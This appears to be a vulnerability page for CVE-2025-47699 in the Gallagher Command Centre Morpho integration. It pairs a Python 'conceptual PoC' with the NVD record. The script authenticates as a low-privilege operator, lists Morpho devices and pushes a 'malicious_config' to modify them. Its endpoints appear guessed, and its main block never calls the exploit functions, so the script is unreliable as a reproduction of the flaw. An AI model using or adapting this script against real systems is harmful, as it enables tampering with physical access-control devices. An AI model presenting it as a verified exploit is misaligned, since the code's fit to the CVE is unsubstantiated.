CVE-2025-47699

# CVE-2025-47699 Gallagher Morpho Integration - PoC Concept # This is a conceptual PoC demonstrating the authorization bypass # Note: Actual exploitation requires valid credentials with limited permissions import requests import json TARGET = "https://target-gallagher-server.com" LOGIN_ENDPOINT = "/api/auth/login" MORPHO_API_ENDPOINT = "/api/morpho/devices" CVE_ID = "CVE-2025-47699" def authenticate(username, password): """Authenticate with limited permissions""" session = requests.Session() login_data = { "username": username, "password": password } response = session.post(f"{TARGET}{LOGIN_ENDPOINT}", json=login_data) if response.status_code == 200: return session, response.json().get('token') return None, None def exploit_morpho_access(session, token): """ Exploit CVE-2025-47699: Bypass authorization to access Morpho devices This endpoint should require higher privileges but is accessible with limited permissions """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Attempt to access Morpho device configuration (should be restricted) response = session.get(f"{TARGET}{MORPHO_API_ENDPOINT}", headers=headers) if response.status_code == 200: devices = response.json() print(f"[!] Successfully accessed Morpho devices with limited permissions") print(f"[+] Found {len(devices)} devices") return devices else: print(f"[-] Access denied: {response.status_code}") return None def modify_morpho_device(session, token, device_id, malicious_config): """Modify Morpho device configuration - critical changes""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Attempt to modify device configuration modify_endpoint = f"{TARGET}{MORPHO_API_ENDPOINT}/{device_id}" response = session.put(modify_endpoint, headers=headers, json=malicious_config) if response.status_code == 200: print(f"[!] Successfully modified Morpho device {device_id}") return True return False if __name__ == "__main__": print(f"[*] Testing {CVE_ID} - Gallagher Morpho Authorization Bypass") print("[*] Requires valid credentials with limited site permissions")

{"cve": {"id": "CVE-2025-47699", "sourceIdentifier": "[email protected]", "published": "2025-10-23T04:16:40.423", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497) in the Gallagher Morpho integration could allow an authenticated operator with limited site permissions to make critical changes to local Morpho devices. \n\nThis issue affects Command Centre Server:\n\n9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-47699", "source": "[email protected]"}]}}